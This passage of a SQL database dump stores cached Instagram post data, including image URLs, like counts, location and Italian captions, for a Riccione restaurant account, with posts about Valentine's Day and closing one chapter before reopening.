\\ud83d\\udc9f \\ni dettagli nei prossimi giorni \\nOra pensiamo a festeggiare L\\\" Amore in tutte le sue forme (anche al lavoro ).\",\"created_time\":\"1580403255\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/73266131_2434073393506646_6764050445787725824_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=AfLgjzGqXLYAX9waSy0&oh=f33f3c6bae2ddacceb75788de951fd19&oe=5EC3242E\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":10},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B784Oj0l8GK\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-02-06'),(18,'2020-02-19 00:24:14','2244472541497683810_8526810189','2020-02-19 00:26:14',NULL,'{\"id\":\"2244472541497683810_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=OdTo3evr1skAX--CfDj&oh=158e8fb1f2fadff69ad04ad5b81d4afd&oe=5EC4A4F7\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c186.0.853.853a\\/s150x150\\/84598299_213738203090992_9098571447475938999_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=Y105yv7sN5IAX-za2s-&oh=606b56b57719cea39682b1b59d588ae0&oe=5F03AF7F\"},\"low_resolution\":{\"width\":320,\"height\":222,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/84598299_213738203090992_9098571447475938999_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=Y105yv7sN5IAX-za2s-&oh=f1986507d7b56bd43c49fe380f41b15e&oe=5EDD8ABE\"},\"standard_resolution\":{\"width\":640,\"height\":445,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/84598299_213738203090992_9098571447475938999_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=Y105yv7sN5IAX-za2s-&oh=9b41034758c352decf333c3890b44341&oe=5EE7AEE9\"}},\"created_time\":\"1581781998\",\"caption\":{\"id\":\"17860960387728186\",\"text\":\"\\\"Sai benissimo che non chiedo tanto adesso\\n\\u00c8 cos\\u00ec limpido il mare che ci ascolta che ci addormenta\\\" \\nQui al \\\"Sol Y Mar\\\" lo abbiamo messo nell\'insegna, il mare: che sulla spiaggia Arcobaleno poi tanto limpido non \\u00e8, e di certo non ci addormenta mai. \\nMa in questa foto di pane c\'\\u00e8 una storia: \\u00e8 il simbolo dei nostri ragazzi che ormai fanno parte della squadra in campo, il pane che per fermentare ha bisogno di riposo, per esplodere di vita e di profumo, ed \\u00e8 la rappresentazione di quello che succeder\\u00e0 al Sol Y Mar. \\nFermarsi per ripartire.\\nNon chiediamo tanto, adesso, anzi niente: in effetti confusi lo siamo, felici... non molto. Per quello attendiamo solo qualche settimana, quando potremo di nuovo parlare di mare, di sole, di noi. \\nA presto. A tutti.\",\"created_time\":\"1581781998\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=OdTo3evr1skAX--CfDj&oh=158e8fb1f2fadff69ad04ad5b81d4afd&oe=5EC4A4F7\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":27},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":1},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B8l9-KAFm9i\\/\",\"location\":{\"latitude\":44.024605137663,\"longitude\":12.631787202682,\"name\":\"Ristorante Sol y Mar - Riccione\",\"id\":872660847},\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-02-29'),(19,'2020-02-19 00:24:15','2243578727127926669_8526810189','2020-02-19 00:24:14',NULL,'{\"id\":\"2243578727127926669_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=OdTo3evr1skAX--CfDj&oh=158e8fb1f2fadff69ad04ad5b81d4afd&oe=5EC4A4F7\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c213.0.853.853a\\/s150x150\\/84611131_179988096593892_8643719829698198191_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=dTHPZgN6FgIAX_811FT&oh=8138e64007e705d25c268d8fa7730032&oe=5EDE25DB\"},\"low_resolution\":{\"width\":320,\"height\":213,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/84611131_179988096593892_8643719829698198191_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=dTHPZgN6FgIAX_811FT&oh=c6608572dd665d8e570034b62f50a1cb&oe=5EF9BBCB\"},\"standard_resolution\":{\"width\":640,\"height\":426,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/84611131_179988096593892_8643719829698198191_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=dTHPZgN6FgIAX_811FT&oh=c111eebcd3128dcc70341068fe942e0f&oe=5F009D9C\"}},\"created_time\":\"1581675447\",\"caption\":{\"id\":\"17847238525905630\",\"text\":\"Questa \\u00e8 una foto che ha scattato un nostro amico, tra una chiacchiera e l\'altra, quando ci \\u00e8 venuto a trovare poco tempo fa. Ci piace perch\\u00e8 racchiude in una immagine tutto di tutto il Sol Y Mar: il rosso della rabbia, i cerchi concentrici della determinazione, il bianco della lucidit\\u00e0 del nostro progetto, il cuore dei nostri figli, la mano di Barbara in sala, la sovrintendenza di Teo nelle realizzazioni di cucina. Forse il nostro amico non ne era consapevole, ma pi\\u00f9 che la foto di un piatto era un ritratto di famiglia.\",\"created_time\":\"1581675447\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=OdTo3evr1skAX--CfDj&oh=158e8fb1f2fadff69ad04ad5b81d4afd&oe=5EC4A4F7\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":37},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B8iyvcgFUeN\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-02-21'),(20,'2020-02-19 00:24:15','2243523873206461955_8526810189','2020-02-19 00:22:14',NULL,'{\"id\":\"2243523873206461955_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=OdTo3evr1skAX--CfDj&oh=158e8fb1f2fadff69ad04ad5b81d4afd&oe=5EC4A4F7\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c15.0.1168.1168a\\/s150x150\\/84253192_225669251775406_7754760639112028836_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=W4F3O1fSoB8AX-4uXMb&oh=6a3f8ad251235019697685af7df95f6d&oe=5EDE222D\"},\"low_resolution\":{\"width\":320,\"height\":311,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/84253192_225669251775406_7754760639112028836_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=W4F3O1fSoB8AX-4uXMb&oh=4a2981110dde142bc0460ccdc6e93b06&oe=5EDD69A8\"},\"standard_resolution\":{\"width\":640,\"height\":623,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/84253192_225669251775406_7754760639112028836_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=W4F3O1fSoB8AX-4uXMb&oh=9a00f0e5996d54d3a09bafceac542e2f&oe=5EFBA9FF\"}},\"created_time\":\"1581668908\",\"caption\":{\"id\":\"18127697971013171\",\"text\":\"Domani chiuderemo Un ciclo ..\\nOggi festeggiamo l Amore sotto tutte le sue forme\\n\\\"Dopo Domani\\\" si riparte \\nL anima del Sol y mar rimane e invader\\u00e0 il suo involucro .#staytuned\\n\\nPossiamo vivere nel mondo una vita meravigliosa se sappiamo lavorare e amare, lavorare per coloro che amiamo e amare ci\\u00f2 per cui lavoriamo.\\n(Lev Tolstoj)\\nBuon San Valentino #happyvalentinesday#solymarriccione\\nTeo ,Barbara &Sons\",\"created_time\":\"1581668908\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=OdTo3evr1skAX--CfDj&oh=158e8fb1f2fadff69ad04ad5b81d4afd&oe=5EC4A4F7\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":23},\"tags\":[\"solymarriccione\",\"staytuned\",\"happyvalentinesday\"],\"filter\":\"Normal\",\"comments\":{\"count\":2},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B8imRNzlGYD\\/\",\"location\":{\"latitude\":44.024605137663,\"longitude\":12.631787202682,\"name\":\"Ristorante Sol y Mar - Riccione\",\"id\":872660847},\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-02-21'),(21,'2020-02-19 00:24:15','2242061559869624919_8526810189','2020-02-19 00:20:14',NULL,'{\"id\":\"2242061559869624919_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=OdTo3evr1skAX--CfDj&oh=158e8fb1f2fadff69ad04ad5b81d4afd&oe=5EC4A4F7\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/84085582_2640506369512433_1814899761851396813_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=Pn4Na4W6zOMAX-rcTh1&oh=9122ca662aecf85974eac67071c84efb&oe=5EFA6A5B\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/84085582_2640506369512433_1814899761851396813_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=Pn4Na4W6zOMAX-rcTh1&oh=b2f02974ea73fdef658ce5135e55b73d&oe=5EF8BC23\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/84085582_2640506369512433_1814899761851396813_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=Pn4Na4W6zOMAX-rcTh1&oh=09f636c54c881674abfa2e03df732201&oe=5EE073DE\"}},\"created_time\":\"1581494587\",\"caption\":{\"id\":\"17889244750473550\",\"text\":\"In questi giorni siamo stati letteralmente sommersi dalle dimostrazioni di affetto e di stima di Amici e Ospiti che con un commento, un messaggio, una telefonata hanno voluto dirci una parola di saluto. A loro siamo particolarmente grati, perch\\u00e9 \\u00e8 su queste fondamenta che costruiremo il nostro futuro: sulla sabbia, ma solido come non mai..Grazie di cuore \\u2764Teo Barbara &Son\",\"created_time\":\"1581494587\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=OdTo3evr1skAX--CfDj&oh=158e8fb1f2fadff69ad04ad5b81d4afd&oe=5EC4A4F7\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":81},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"carousel\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B8dZxwYllJX\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[],\"carousel_media\":[{\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/84085582_2640506369512433_1814899761851396813_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=Pn4Na4W6zOMAX-rcTh1&oh=9122ca662aecf85974eac67071c84efb&oe=5EFA6A5B\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/84085582_2640506369512433_1814899761851396813_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=Pn4Na4W6zOMAX-rcTh1&oh=b2f02974ea73fdef658ce5135e55b73d&oe=5EF8BC23\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/84085582_2640506369512433_1814899761851396813_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=Pn4Na4W6zOMAX-rcTh1&oh=09f636c54c881674abfa2e03df732201&oe=5EE073DE\"}},\"users_in_photo\":[],\"type\":\"image\"},{\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/83452711_489007918715637_2428856686467057376_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=OoEr4qZVPpcAX94x0gk&oh=81818996134abf81478c0b0769bb903e&oe=5EE220FA\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/83452711_489007918715637_2428856686467057376_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=OoEr4qZVPpcAX94x0gk&oh=eedd5569f8a33250a6ae10d85e2c0b0e&oe=5EC3C40A\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/83452711_489007918715637_2428856686467057376_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=OoEr4qZVPpcAX94x0gk&oh=90f80aefef510bfa868bbc03f20b0261&oe=5EC3BF5D\"}},\"users_in_photo\":[],\"type\":\"image\"},{\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/80435957_3479031068834827_864808959707803325_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=jZ9xeRWGWSgAX8swI8N&oh=6d3084dc1ff0f93fd9de8171aa70710e&oe=5EDFD0C5\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/80435957_3479031068834827_864808959707803325_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=jZ9xeRWGWSgAX8swI8N&oh=0316ccb1b095792215828862fc08112b&oe=5EC39C35\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/80435957_3479031068834827_864808959707803325_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=jZ9xeRWGWSgAX8swI8N&oh=e4ffa08694ba882a0833048ae76ea99f&oe=5EF57662\"}},\"users_in_photo\":[],\"type\":\"image\"},{\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/81176020_544030516471037_5122560485455180140_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=ItPh2EVYNdgAX-dt8Ig&oh=4058ebc5cc6e798bdbe40e9ec2297dbc&oe=5EDF6743\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/81176020_544030516471037_5122560485455180140_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=ItPh2EVYNdgAX-dt8Ig&oh=15da2b1ca8c2a4d5a74c082143bbc1d6&oe=5EF55CB3\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/81176020_544030516471037_5122560485455180140_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=ItPh2EVYNdgAX-dt8Ig&oh=479c6e8bb376c320426cd1b6983358ca&oe=5ECBE5E4\"}},\"users_in_photo\":[],\"type\":\"image\"},{\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/83895811_218981729128968_4742911184367075081_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=VhuuZ0LFJx0AX8ZZVsU&oh=3ec8b09c7445ae03513d72d0eb55b8e3&oe=5EFBF1F1\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/83895811_218981729128968_4742911184367075081_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=VhuuZ0LFJx0AX8ZZVsU&oh=211281b71dae889b58c57c78a2d32730&oe=5EC87501\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/83895811_218981729128968_4742911184367075081_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=VhuuZ0LFJx0AX8ZZVsU&oh=6635727987728a7f61db1aba67f2d3f1&oe=5F032456\"}},\"users_in_photo\":[],\"type\":\"image\"},{\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/84348976_636910680390289_8140050215419472672_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=eyCGXbcZa_UAX9BW3g5&oh=bfe925204c6ce011e7193bfd2da23ccd&oe=5EF9F3C5\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/84348976_636910680390289_8140050215419472672_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=eyCGXbcZa_UAX9BW3g5&oh=81d4328175e7229d1ce04e45577dbf04&oe=5EF98935\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/84348976_636910680390289_8140050215419472672_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=eyCGXbcZa_UAX9BW3g5&oh=65012ec790f6c328a91c5af0bfbd9686&oe=5EFD0862\"}},\"users_in_photo\":[],\"type\":\"image\"}]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-02-21'),(22,'2020-02-19 00:24:15','2241739128672067874_8526810189','2020-02-19 00:18:14',NULL,'{\"id\":\"2241739128672067874_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=OdTo3evr1skAX--CfDj&oh=158e8fb1f2fadff69ad04ad5b81d4afd&oe=5EC4A4F7\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/83669111_470826387138972_5462978390862974779_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=GQ6cm0dIuLwAX9-iH19&oh=febc96c632b0f79a5a9045002b5c3489&oe=5EE91768\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/83669111_470826387138972_5462978390862974779_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=GQ6cm0dIuLwAX9-iH19&oh=4debab9ca07416517a9d1b21a57dfd17&oe=5EDC5698\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/83669111_470826387138972_5462978390862974779_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=GQ6cm0dIuLwAX9-iH19&oh=4d39344c096d5bf8c60d484ec4d15400&oe=5EC882CF\"}},\"created_time\":\"1581456150\",\"caption\":null,\"user_has_liked\":false,\"likes\":{\"count\":47},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":1},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B8cQdw7l6Ei\\/\",\"location\":{\"latitude\":44.024605137663,\"longitude\":12.631787202682,\"name\":\"Ristorante Sol y Mar - Riccione\",\"id\":872660847},\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-02-21'),(23,'2020-02-19 00:24:15','2240723732233723699_8526810189','2020-02-19 00:16:14',NULL,'{\"id\":\"2240723732233723699_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=OdTo3evr1skAX--CfDj&oh=158e8fb1f2fadff69ad04ad5b81d4afd&oe=5EC4A4F7\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/84066441_861829504279597_115720378174243061_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=JMbUJf4g00IAX-jdfQ0&oh=333c2a89c0cbf23c9158a9cc118b1288&oe=5F000B52\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/84066441_861829504279597_115720378174243061_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=JMbUJf4g00IAX-jdfQ0&oh=18d0bdb5b0843ffa6b36aa0ef3ef6e9e&oe=5EE2E65F\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/84066441_861829504279597_115720378174243061_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=JMbUJf4g00IAX-jdfQ0&oh=f9cd15d01f89ecd8202d0d9939f9cc69&oe=5EC90CB3\"}},\"created_time\":\"1581335105\",\"caption\":{\"id\":\"17889149266470831\",\"text\":\"Il mare, una volta lanciato il suo incantesimo, ti tiene per sempre nella sua rete di meraviglia.\\n(Jacques Cousteau)\",\"created_time\":\"1581335105\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=OdTo3evr1skAX--CfDj&oh=158e8fb1f2fadff69ad04ad5b81d4afd&oe=5EC4A4F7\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":49},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B8YplzTlB8z\\/\",\"location\":{\"latitude\":44.024605137663,\"longitude\":12.631787202682,\"name\":\"Ristorante Sol y Mar - Riccione\",\"id\":872660847},\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-02-21'),(24,'2020-02-19 00:24:15','2240142731866751883_8526810189','2020-02-19 00:14:14',NULL,'{\"id\":\"2240142731866751883_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=OdTo3evr1skAX--CfDj&oh=158e8fb1f2fadff69ad04ad5b81d4afd&oe=5EC4A4F7\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.150.1200.1200a\\/s150x150\\/84257970_175188013740697_3273289057462954163_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=Kg2ebScGN7oAX9fsLUC&oh=8060cd270f42cd417de0a23806cffa1c&oe=5F017CB6\"},\"low_resolution\":{\"width\":320,\"height\":400,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/p320x320\\/84257970_175188013740697_3273289057462954163_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=Kg2ebScGN7oAX9fsLUC&oh=5460cd0ad050a10d4a801f38e2f7f6c7&oe=5EE0ED53\"},\"standard_resolution\":{\"width\":640,\"height\":800,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/p640x640\\/84257970_175188013740697_3273289057462954163_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=Kg2ebScGN7oAX9fsLUC&oh=4ea32ea41fce492608f6806880478cfe&oe=5EE57C04\"}},\"created_time\":\"1581265845\",\"caption\":{\"id\":\"18051950947214547\",\"text\":\"\\u2026 Qual \\u00e8 la mia debolezza? Dovrei pensarci. Probabilmente avrei lo stesso problema nel rispondere se mi chiedeste qual \\u00e8 la mia forza. E forse sono la stessa cosa.\\n(Al Pacino)\",\"created_time\":\"1581265845\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=OdTo3evr1skAX--CfDj&oh=158e8fb1f2fadff69ad04ad5b81d4afd&oe=5EC4A4F7\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":72},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B8WlfIjF0OL\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]}','error','a:1:{s:3:\"low\";i:320;}',1.00,1,'2020-02-19'),(25,'2020-02-19 00:24:15','2240115715465493986_8526810189','2020-02-19 00:12:14',NULL,'{\"id\":\"2240115715465493986_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y 